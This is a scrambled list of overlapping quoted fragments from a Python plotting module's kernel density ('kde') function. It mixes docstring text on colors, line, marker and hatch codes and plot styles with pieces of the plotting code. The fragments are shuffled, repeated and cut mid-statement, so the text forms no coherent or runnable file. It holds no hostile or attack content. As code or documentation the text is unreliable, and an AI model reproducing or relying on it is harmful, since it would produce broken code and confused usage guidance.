legend_names : str [optional, defaults to None]", "| +-------+----------------+ | ' ' | nothing | +-------+----------------+ |", "type equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If 'auto'", "* For --norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\"", "drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1,", "which time-series to plot on secondary y-axis. mark_right [optional, default", "vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need to work", "secondary y-axis. mark_right [optional, default is True] When using a", "automatically. scatter_matrix_diagonal : str [optional, defaults to 'kde'] If plot", "[]], None], # vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float, [\"pass\",", "values where to place a vertical line. vlines_ymin: [optional, defaults", "[\"pass\", []], None], # vlines_linestyles=[ # str, # [\"domain\", [\"auto\",", "some old option defaults with the implementation of # mando", "+---------+--------------+ | : | dotted | +---------+--------------+ | None |", "sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for", "{source_units} {target_units} {round_index} plot_styles: str [optional, default is \"default\"] Set", "str [optional, defaults to 'plot.png'] Output filename for the plot.", "str [optional, defaults to None] Legend would normally use the", "instead of using the 'style' keyword. +-------+----------------+ | Code |", "[\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]], 1], #", "xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\", [True, False]], 1],", "List of minimum y values to start the vertical line.", "| hexagon2 | +-------+----------------+ | ``+`` | plus | +-------+----------------+", "\"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\",", "start at the minimum x value for the entire plot.", "the entire plot. vlines_colors: [optional, defaults to None] List of", "# \"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\", # \"bright\",", "is 'default'] 'default' connects the points with lines. The steps", "supply a comma separated list of strings for each time-series", "is not None: m = next(imarkerstyles) else: m = None", "be used as the minimum x values for all horizontal", "= ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle)", "allows you to override the names in the data set.", "+-------+----------------+ | ^ | triangle up | +-------+----------------+ | <", "of y values] Comma separated lower and upper limits for", "1 to 1000, where '--xlim ,1000' would base the lower", "as `vlines_x`. 
If None will take from the standard linestyles
norm_xaxis DEPRECATED:", "== \"\" or legend == \"True\" or legend is None)", "if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines(", "\"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", #", "len(tsd.columns) ) ) ) colors = [] markerstyles = []", "# \"high-vis\", # \"bright\", # \"vibrant\", # \"muted\", # \"retro\",", "'descending'] How to sort the values for the probability plots.", "You must supply a comma separated list of strings for", "= next(icolors) else: c = None if imarkerstyles is not", "plt.setp(line, linestyle=l) ytitle = ytitle or \"Density\" if legend is", "value or None will end at the maximum x value", "import FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date,", "not plot a marker. If 'auto' will iterate through the", "| '' | nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style", "\"retro\", # ], # ], # None, # ], #", "http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto'] If 'auto' will iterate", "\"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and", "frequency try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq", "start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title,", "sharey=[bool, [\"domain\", [True, False]], 1], # colors=[str, [\"pass\", []], None],", "a list of strings if using the Python API. To", "label_skip : int [optional] Skip for major labels for bar", "of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\",", "markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try:", "title : str [optional, defaults to ''] Title of chart.", "codes, or within Python a list of color code strings.", "| +------------------+ | ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles", "Comma separated lower and upper limits for the y-axis of", "to None] List of linestyles for the vertical lines. If", "to fit in a column of the \"IEEE\" journal. The", "+ plotutils.HATCH_LIST], None], # style=[str, [\"pass\", []], None], # xlim=[float,", "to None] List of minimum x values to start the", "+------+---------+ | c | cyan | +------+---------+ | m |", "1], # xtitle=[str, [\"pass\", []], 1], # ytitle=[str, [\"pass\", []],", ". | dots | +-----------------+-------------------+ | * | stars |", ") def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\",", "\" if i in [\" \", None] else i for", "not None: icolors = itertools.cycle(colors) else: icolors = None imarkerstyles", "used as the linestyle for all horizontal lines. If a", "as needed. lag_plot_lag [optional, default to 1] The lag used", "subset for 'bootstrap' plot. bootstrap_samples [optional, defaults to 500] The", "== \"none\": short_freq = \"\" else: # short freq string", "default is \"default\"] Set the style of the plot. One", "label the axis of the various time-series automatically. 
scatter_matrix_diagonal :", "defaults to ''] Title of chart. figsize : str [optional,", "+-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style [optional, default is None] Still", "plot a marker. If 'auto' will iterate through the available", "lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis,", "names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True,", "# \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", # \"grid\", # \"ieee\",", "| Code | Lines | +=========+==============+ | ``-`` | solid", "sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\",", "list must be same length as `hlines_y`. If None will", "k | black | +------+---------+ 3. Number between 0 and", "[\"pass\", []], 2], # ylim=[float, [\"pass\", []], 2], # xaxis=[str,", "False]], 1], # plotting_position=[ # str, # [ # \"domain\",", "vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need to", "--xaxis=\"log\" * For --logy use --yaxis=\"log\" * For --norm_xaxis use", "xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles =", "\"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]], 1], # mark_right=[bool,", "x-axis. invert_yaxis [optional, default is False] Invert the y-axis. plotting_position", "strings if using the Python API. +-----------------+-------------------+ | bar_hatchstyles |", "\"notebook\", # \"high-vis\", # \"bright\", # \"vibrant\", # \"muted\", #", "'arithmetic'] Defines the type of the yaxis. One of 'arithmetic',", "using the Python API. Separated 'colors', 'linestyles', and 'markerstyles' instead", "yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]],", "--norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\" * For", "line with star marker. bar_hatchstyles [optional, default to \"auto\", only", "+------+---------+ | g | green | +------+---------+ | r |", "styles then each over rides some or all of the", "pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils from", "\"\", \" \", \" \"] + plotutils.LINE_LIST], # None, #", "# legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\", [True, False]],", "+-------+----------------+ | H | hexagon2 | +-------+----------------+ | ``+`` |", "bootstrap_samples [optional, defaults to 500] The number of random subsets", "the linestyle for all horizontal lines. If a list must", "to work around some old option defaults with the implementation", ": | dotted | +---------+--------------+ | None | draw nothing", "the available matplotlib marker types. Otherwise on the command line", "for a histogram. bootstrap_size : int [optional, defaults to 50]", "plot grid lines on the major ticks. label_rotation : int", "to be distinguished by someone with color blindness. Black, White,", "plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize) if", "scatter_matrix_diagonal : str [optional, defaults to 'kde'] If plot type", "and weibull_yaxis. 
prob_plot_sort_values : str [optional, default is 'descending'] How", "# Need to work around some old option defaults with", "tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns,", "= nylim[0] if vlines_ymax is None: vlines_ymax = nylim[1] if", "horizontal lines. If a list must be same length as", "input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle,", "== \"auto\": colors = None else: colors = tsutils.make_list(colors) if", "color pallette in the current plot style. hlines_linestyles: [optional, defaults", "stars | +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED:", "the random subset for 'bootstrap' plot. bootstrap_samples [optional, defaults to", "icolors = None imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) #", "[]], None], # hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None,", "vlines_x is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin)", "for the vertical lines. If a single color then will", "vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if", "= plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is None:", "plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis is True:", "the entire plot. vlines_ymax: [optional, defaults to None] List of", "hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles,", "hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \" \",", "available matplotlib hatch types. Otherwise on the command line a", "label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\",", "| magenta | +------+---------+ | y | yellow | +------+---------+", "hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is not None: if", "\"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", #", "kernel density estimation (KDE). {ydata} Parameters ---------- {input_ts} ofilename :", "[]], 1], # grid=[bool, [\"domain\", [True, False]], 1], # label_rotation=[float,", "| +------+---------+ | y | yellow | +------+---------+ | k", "| vertical | +-----------------+-------------------+ | - | horizontal | +-----------------+-------------------+", "| Lines | +=========+==============+ | ``-`` | solid | +---------+--------------+", "# ], # 1, # ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\",", "xaxis == \"log\": logx = True if yaxis == \"log\":", "| yellow | +------+---------+ | k | black | +------+---------+", "[1, None]], 1], # xtitle=[str, [\"pass\", []], 1], # ytitle=[str,", "linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis() if", "\"auto\": nstyle = tsutils.make_list(style) if len(nstyle) != len(tsd.columns): raise ValueError(", "keyword. 
        +---------+--------------+
        | Code    | Lines        |
        +=========+==============+
        | ``-``   | solid        |
        +---------+--------------+
        | --      | dashed       |
        +---------+--------------+
        | -.      | dash_dot     |
        +---------+--------------+
        | :       | dotted       |
        +---------+--------------+
        | None    | draw nothing |
        +---------+--------------+
        | ' '     | draw nothing |
        +---------+--------------+
        | ''      | draw nothing |
        +---------+--------------+
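
        As a quick sketch of passing these codes from Python (the
        import path and file name here are illustrative assumptions,
        not fixed by this module)::

            from plottoolbox import kde

            # First series solid, second dashed, third dotted.
            kde(input_ts="data.csv", linestyles="-,--,:")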
xtitle : str
    [optional, default depends on ``type``]

    Title of x-axis.

ytitle : str
    [optional, default depends on ``type``]

    Title of y-axis.
title : str
    [optional, defaults to '']

    Title of chart.

figsize : str
    [optional, defaults to '10,6.5']

    The 'width,height' of plot in inches.

legend
    [optional, defaults to True]

    Whether to display the legend.

legend_names : str
    [optional, defaults to None]

    Legend would normally use the time-series names associated with
    the input data. The 'legend_names' option allows you to override
    the names in the data set. You must supply a comma separated list
    of strings for each time-series in the data set.

style
    [optional, default is None]

    Still available, but if None it is replaced by the 'colors',
    'linestyles', and 'markerstyles' options.
    Comma separated matplotlib style strings, one per time-series.
    Just combine codes in 'ColorMarkerLine' order; for example 'r*--'
    is a red dashed line with a star marker. To not display lines use
    a space (' ') as the linestyle code.

plot_styles: str
    [optional, default is "bright"]

    Set the style of the plot. One or more of Matplotlib styles
    "classic", "Solarize_Light2", "bmh", "dark_background", "fast",
    "fivethirtyeight", "ggplot", "grayscale", "seaborn" and its
    "seaborn-*" variants, "tableau-colorblind10", and SciencePlots
    styles "science", "grid", "ieee", "scatter", "notebook",
    "high-vis", "bright", "vibrant", "muted", and "retro". If multiple
    styles are given, each overrides some or all of the
    characteristics of the previous.
    Color Blind Appropriate Styles
        The styles "seaborn-colorblind", "tableau-colorblind10",
        "bright", "vibrant", and "muted" are all set up to be
        distinguishable by someone with color blindness.

    Black, White, and Gray Styles
        The "ieee" style is appropriate for black, white, and gray,
        and will also change the chart size to fit in a column of the
        "IEEE" journal. The "grayscale" style is another option for
        photo-copyable black, white, and gray plots.
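    For example, a hedged sketch of layering styles; later styles
    override earlier ones, and ``data.csv`` is again a hypothetical
    input file::

        # "science" sets the base look; "ieee" then switches to a
        # black/white/gray palette sized for an IEEE journal column.
        kde(input_ts="data.csv", plot_styles="science,ieee")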
invert_yaxis
    [optional, default is False]

    Invert the y-axis.

hlines_colors:
    [optional, defaults to None]

    List of colors for the horizontal lines.
    If a single color, it will be used as the color for all
    horizontal lines. If a list, it must be the same length as
    `hlines_y`. If None, colors are taken from the color palette of
    the current plot style.
hlines_xmax:
    [optional, defaults to None]

    List of maximum x values to end each horizontal line. A missing
    value or None will end at the maximum x value for the entire
    plot. If a single number, it is used as the maximum x value for
    all horizontal lines; if a list, it must be the same length as
    `hlines_y`.

hlines_linestyles:
    [optional, defaults to '-']

    List of linestyles for the horizontal lines. If a single
    linestyle, it is used for all horizontal lines; if a list, it
    must be the same length as `hlines_y`; if None, the standard
    linestyles list is used.
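    A minimal sketch of horizontal reference lines (the y values,
    colors, and linestyles below are arbitrary placeholders)::

        kde(
            input_ts="data.csv",
            hlines_y=[0.1, 0.25],            # two horizontal lines
            hlines_colors=["red", "gray"],   # one color per line
            hlines_linestyles=["--", ":"],   # one linestyle per line
        )

    Because ``hlines_xmin`` and ``hlines_xmax`` are omitted, each line
    spans the full x range of the plot.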
    Note that the 'style' option described above, when given,
    currently overrides the separate 'colors', 'linestyles', and
    'markerstyles' options.

grid
    [optional, default is False]

    Whether to plot grid lines on the major ticks.
label_rotation : int
    [optional]

    Rotation for major labels for bar plots.

label_skip : int
    [optional]

    Skip for major labels for bar plots.
    For any of the hlines_* or vlines_* options, a single number is
    applied to every line, while a list must match the length of
    `hlines_y` or `vlines_x` respectively.

The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and
--lognorm_yaxis options are deprecated:

* For --logx use --xaxis="log"
* For --logy use --yaxis="log"
* For --norm_xaxis use --type="norm_xaxis"
* For --norm_yaxis use --type="norm_yaxis"
* For --lognorm_xaxis use --type="lognorm_xaxis"
* For --lognorm_yaxis use --type="lognorm_yaxis"
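A sketch of migrating one of the deprecated keywords to its
replacement through the Python API (same hypothetical ``data.csv``
input as above)::

    kde(input_ts="data.csv", logx=True)     # deprecated spelling
    kde(input_ts="data.csv", xaxis="log")   # preferred replacement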
The plotting_position and prob_plot_sort_values options are only used
for the norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis,
weibull_xaxis, and weibull_yaxis plot types.

xaxis : str
    [optional, default is 'arithmetic']

    Defines the type of the x axis. One of 'arithmetic', 'log'.

yaxis : str
    [optional, default is 'arithmetic']

    Defines the type of the y axis. One of 'arithmetic', 'log'.
secondary_y
    [optional, default is False]

    Whether to plot on the secondary y-axis. If a list/tuple, gives
    which time-series to plot on the secondary y-axis.

mark_right
    [optional, default is True]

    When using a secondary_y axis, should the legend automatically
    label the axis of the various time-series.
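    A hedged sketch of the secondary-axis options; how useful a
    secondary axis is depends on the plot ``type``::

        # Plot the series against a secondary y-axis and let the
        # legend note which axis each series uses.
        kde(input_ts="data.csv", secondary_y=True, mark_right=True)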
lognorm_yaxis
    DEPRECATED: use '--type="lognorm_yaxis"' instead.

xy_match_line : str
    [optional, defaults to '']

    Will add a match line where x == y. Set to a line style code.
subplots
    [optional, defaults to False]

    Make separate subplots for each time series.

sharex
    [optional, default to True]

    In case subplots=True, share the x axis.

sharey
    [optional, default to False]

    In case subplots=True, share the y axis.
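    A sketch of the subplot-sharing options, giving one panel per
    column of the hypothetical ``data.csv``::

        kde(input_ts="data.csv", subplots=True, sharex=True,
            sharey=False)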
vlines_x:
    [optional, defaults to None]

    List of x values where to place a vertical line.

vlines_ymin:
    [optional, defaults to None]

    List of minimum y values to start the vertical line. A missing
    value or None will start at the minimum y value for the entire
    plot. If a single number, it is used for all vertical lines; if a
    list, it must be the same length as `vlines_x`.

vlines_ymax:
    [optional, defaults to None]

    List of maximum y values to end each vertical line. A missing
    value or None will end at the maximum y value for the entire
    plot. If a single number, it is used for all vertical lines; if a
    list, it must be the same length as `vlines_x`.

vlines_colors:
    [optional, defaults to None]

    List of colors for the vertical lines. If a single color, it is
    used for all vertical lines; if a list, it must be the same
    length as `vlines_x`; if None, colors are taken from the color
    palette of the current plot style.

vlines_linestyles:
    [optional, defaults to '-']

    List of linestyles for the vertical lines. If a single linestyle,
    it is used for all vertical lines; if a list, it must be the same
    length as `vlines_x`; if None, the standard linestyles list is
    used.
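    A minimal sketch of a single vertical marker line; the x position
    is an arbitrary placeholder::

        # With vlines_ymin/vlines_ymax omitted, the line spans the
        # full y range of the plot.
        kde(input_ts="data.csv", vlines_x=[2.5],
            vlines_colors=["black"], vlines_linestyles=["--"])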
Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional,", "1: markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1])", "* For --logy use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\"", "if yaxis == \"log\": logy = True xlim = plotutils.know_your_limits(xlim,", "of style strings as time-series to plot. You supplied '{}'", "xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index, line in enumerate(ax.lines):", "the minimum x values for all horizontal lines. A missing", "int [optional] Rotation for major labels for bar plots. label_skip", "print_function import itertools import os import warnings import mando import", "separated list, or a list of strings if using the", "bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right,", "will cycle through matplotlib colors in the chosen style. At", "time series.\"\"\" from __future__ import absolute_import, division, print_function import itertools", "an 1 is black. 4. Any of the HTML color", "the plot. Extension defines the type, for example 'filename.png' will", "[optional, defaults to '10,6.5'] The 'width,height' of plot in inches.", "of minimum x values to start the horizontal line. If", "| star | +-------+----------------+ | h | hexagon1 | +-------+----------------+", "entire plot. hlines_xmax: [optional, defaults to None] List of maximum", "for examples. xaxis : str [optional, default is 'arithmetic'] Defines", "entire plot. vlines_ymax: [optional, defaults to None] List of maximum", "| _ | hlines_y | +-------+----------------+ | None | nothing", "is based on range of x values] Comma separated lower", "type in [ \"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\",", "legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\",", "magenta | +------+---------+ | y | yellow | +------+---------+ |", "False] Whether to plot grid lines on the major ticks.", "if vlines_x is not None: if type in [\"norm_xaxis\", \"lognorm_xaxis\",", "int [optional] Skip for major labels for bar plots. drawstyle", "x values to end each vertical line. If a list", "on ``type``] Title of y-axis. title : str [optional, defaults", "| +-------+----------------+ | ``+`` | plus | +-------+----------------+ | x", "\"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles,", "with the input data. The 'legend_names' option allows you to", "if legend is True: plt.legend(loc=\"best\") if hlines_y is not None:", "| v | triangle down | +-------+----------------+ | ^ |", "= ax.get_ylim() if vlines_ymin is None: vlines_ymin = nylim[0] if", "of strings if using the Python API. To not display", "legend = bool(legend == \"\" or legend == \"True\" or", "for the y-axis of the plot. See `xlim` for examples.", "circle | +-----------------+-------------------+ | O | large circle | +-----------------+-------------------+", "a single number will be the maximum x value for", "in 'ColorMarkerLine' order, for example 'r*--' is a red dashed", "i + \".mplstyle\")) else i for i in plot_styles ]", "strings as time-series to plot. 
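        A hedged illustration of the two calling conventions described
        above (the "data.csv" file, the ``plottoolbox`` entry point,
        and the importable ``kde`` name are assumptions, not from the
        original docstring)::

            # Command line: comma separated color codes.
            plottoolbox kde --colors 'C0,red,0.5' < data.csv

            # Python API: a list of color code strings.
            from plottoolbox import kde
            kde(input_ts="data.csv", colors=["C0", "red", "0.5"])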
    linestyles
        [optional, default to 'auto']

        If 'auto' will iterate through the available matplotlib line
        types.  Otherwise on the command line a comma separated list,
        or a list of strings if using the Python API.

        To not display lines use a space (' ') as the linestyle code.

        Provide 'colors', 'linestyles', and 'markerstyles' as separate
        options instead of using the 'style' keyword.

        +---------+--------------+
        | Code    | Lines        |
        +=========+==============+
        | ``-``   | solid        |
        +---------+--------------+
        | --      | dashed       |
        +---------+--------------+
        | -.      | dash_dot     |
        +---------+--------------+
        | :       | dotted       |
        +---------+--------------+
        | None    | draw nothing |
        +---------+--------------+
        | ' '     | draw nothing |
        +---------+--------------+
        | ''      | draw nothing |
        +---------+--------------+

        Line reference:
        http://matplotlib.org/api/artist_api.html
    markerstyles
        [optional, default to ' ']

        The default ' ' will not plot a marker.  If 'auto' will
        iterate through the available matplotlib marker types.
        Otherwise on the command line a comma separated list, or a
        list of strings if using the Python API.

        Provide 'colors', 'linestyles', and 'markerstyles' as separate
        options instead of using the 'style' keyword.

        +-------+----------------+
        | Code  | Markers        |
        +=======+================+
        | .     | point          |
        +-------+----------------+
        | o     | circle         |
        +-------+----------------+
        | v     | triangle down  |
        +-------+----------------+
        | ^     | triangle up    |
        +-------+----------------+
        | <     | triangle left  |
        +-------+----------------+
        | >     | triangle right |
        +-------+----------------+
        | 1     | tri_down       |
        +-------+----------------+
        | 2     | tri_up         |
        +-------+----------------+
        | 3     | tri_left       |
        +-------+----------------+
        | 4     | tri_right      |
        +-------+----------------+
        | 8     | octagon        |
        +-------+----------------+
        | s     | square         |
        +-------+----------------+
        | p     | pentagon       |
        +-------+----------------+
        | ``*`` | star           |
        +-------+----------------+
        | h     | hexagon1       |
        +-------+----------------+
        | H     | hexagon2       |
        +-------+----------------+
        | ``+`` | plus           |
        +-------+----------------+
        | x     | x              |
        +-------+----------------+
        | D     | diamond        |
        +-------+----------------+
        | d     | thin diamond   |
        +-------+----------------+
        | _     | hline          |
        +-------+----------------+
        | None  | nothing        |
        +-------+----------------+
        | ' '   | nothing        |
        +-------+----------------+
        | ''    | nothing        |
        +-------+----------------+

        Marker reference:
        http://matplotlib.org/api/markers_api.html
    style
        [optional, default is None]

        Still available, but if None is replaced by the 'colors',
        'linestyles', and 'markerstyles' options.  Currently the
        'style' option will override the others.

        Comma separated matplotlib style strings per time-series.
        Just combine codes in 'ColorMarkerLine' order, for example
        'r*--' is a red dashed line with star marker.
    bar_hatchstyles
        [optional, default to "auto", only used if type equal to
        "bar", "barh", "bar_stacked", and "barh_stacked"]

        If 'auto' will iterate through the available matplotlib hatch
        types.  Otherwise on the command line a comma separated list,
        or a list of strings if using the Python API.

        +-----------------+-------------------+
        | bar_hatchstyles | Description       |
        +=================+===================+
        | /               | diagonal hatching |
        +-----------------+-------------------+
        | ``\``           | back diagonal     |
        +-----------------+-------------------+
        | ``|``           | vertical          |
        +-----------------+-------------------+
        | -               | horizontal        |
        +-----------------+-------------------+
        | +               | crossed           |
        +-----------------+-------------------+
        | x               | crossed diagonal  |
        +-----------------+-------------------+
        | o               | small circle      |
        +-----------------+-------------------+
        | O               | large circle      |
        +-----------------+-------------------+
        | .               | dots              |
        +-----------------+-------------------+
        | *               | stars             |
        +-----------------+-------------------+
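        A hedged sketch of the 'ColorMarkerLine' equivalence described
        above (the file name and entry point are assumptions)::

            # One style string per time-series...
            plottoolbox kde --style 'r*--,b.-' < data.csv

            # ...behaves the same as the separated options.
            plottoolbox kde --colors 'r,b' --markerstyles '*,.' \
                --linestyles '--,-' < data.csv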
    logx
        DEPRECATED: use '--xaxis="log"' instead.
    logy
        DEPRECATED: use '--yaxis="log"' instead.
    xlim
        [optional, default is based on the range of x values]

        Comma separated lower and upper limits for the x-axis of the
        plot.  For example, '--xlim 1,1000' would limit the plot from
        1 to 1000, where '--xlim ,1000' would base the lower limit on
        the data and set the upper limit to 1000.
    ylim
        [optional, default is based on the range of y values]

        Comma separated lower and upper limits for the y-axis of the
        plot.  See `xlim` for examples.
    xaxis : str
        [optional, default is 'arithmetic']

        Defines the type of the xaxis.  One of 'arithmetic', 'log'.
    yaxis : str
        [optional, default is 'arithmetic']

        Defines the type of the yaxis.  One of 'arithmetic', 'log'.
    secondary_y
        [optional, default is False]

        Whether to plot on the secondary y-axis.  If a list/tuple,
        which time-series to plot on the secondary y-axis.
    mark_right
        [optional, default is True]

        When using a secondary_y axis, should the legend label the
        axis of the various time-series automatically.
    scatter_matrix_diagonal : str
        [optional, defaults to 'kde']

        If the plot type is 'scatter_matrix', this specifies the plot
        along the diagonal.  One of 'kde' for Kernel Density
        Estimation or 'hist' for a histogram.
    bootstrap_size : int
        [optional, defaults to 50]

        The size of the random subset for the 'bootstrap' plot.
    bootstrap_samples
        [optional, defaults to 500]

        The number of random subsets of 'bootstrap_size'.
    norm_xaxis
        DEPRECATED: use '--type="norm_xaxis"' instead.
    norm_yaxis
        DEPRECATED: use '--type="norm_yaxis"' instead.
    lognorm_xaxis
        DEPRECATED: use '--type="lognorm_xaxis"' instead.
    lognorm_yaxis
        DEPRECATED: use '--type="lognorm_yaxis"' instead.
    xy_match_line : str
        [optional, defaults is '']

        Will add a match line where x == y.  Set to a line style code
        to enable.
    grid
        [optional, default is False]

        Whether to plot grid lines on the major ticks.
    label_rotation : int
        [optional]

        Rotation for major labels for bar plots.
    label_skip : int
        [optional]

        Skip for major labels for bar plots.
    drawstyle : str
        [optional, default is 'default']

        'default' connects the points with lines.  The steps variants
        produce step-plots.  'steps' is equivalent to 'steps-pre' and
        is maintained for backward-compatibility.

        ACCEPTS::

            ['default' | 'steps' | 'steps-pre' | 'steps-mid' | 'steps-post']
    por
        [optional]

        Plot from the first good value to the last good value.  Strips
        NANs from the beginning and end.
    {force_freq}
    invert_xaxis
        [optional, default is False]

        Invert the x-axis.
    invert_yaxis
        [optional, default is False]

        Invert the y-axis.
    plotting_position : str
        [optional, default is 'weibull']

        {plotting_position_table}

        Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,
        lognorm_yaxis, weibull_xaxis, and weibull_yaxis.
    prob_plot_sort_values : str
        [optional, default is 'descending']

        How to sort the values for the probability plots.  Only used
        for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis,
        weibull_xaxis, and weibull_yaxis.
    {columns}
    {start_date}
    {end_date}
    {clean}
    {skiprows}
    {index_type}
    {names}
    {source_units}
    {target_units}
    {round_index}
    plot_styles: str
        [optional, default is "default"]

        Set the style of the plot.  One or more of Matplotlib styles
        "classic", "Solarize_Light2", "bmh", "dark_background",
        "fast", "fivethirtyeight", "ggplot", "grayscale", "seaborn",
        "seaborn-bright", "seaborn-colorblind", "seaborn-dark",
        "seaborn-dark-palette", "seaborn-darkgrid", "seaborn-deep",
        "seaborn-muted", "seaborn-notebook", "seaborn-paper",
        "seaborn-pastel", "seaborn-poster", "seaborn-talk",
        "seaborn-ticks", "seaborn-white", "seaborn-whitegrid",
        "tableau-colorblind10", and the SciencePlots styles "science",
        "grid", "ieee", "scatter", "notebook", "high-vis", "bright",
        "vibrant", "muted", and "retro".

        If multiple styles are given, each overrides some or all of
        the characteristics of the previous.

        Color Blind Appropriate Styles

        The styles "seaborn-colorblind", "tableau-colorblind10",
        "bright", "vibrant", and "muted" are all styles that are able
        to be distinguished by someone with color blindness.

        Black, White, and Gray Styles

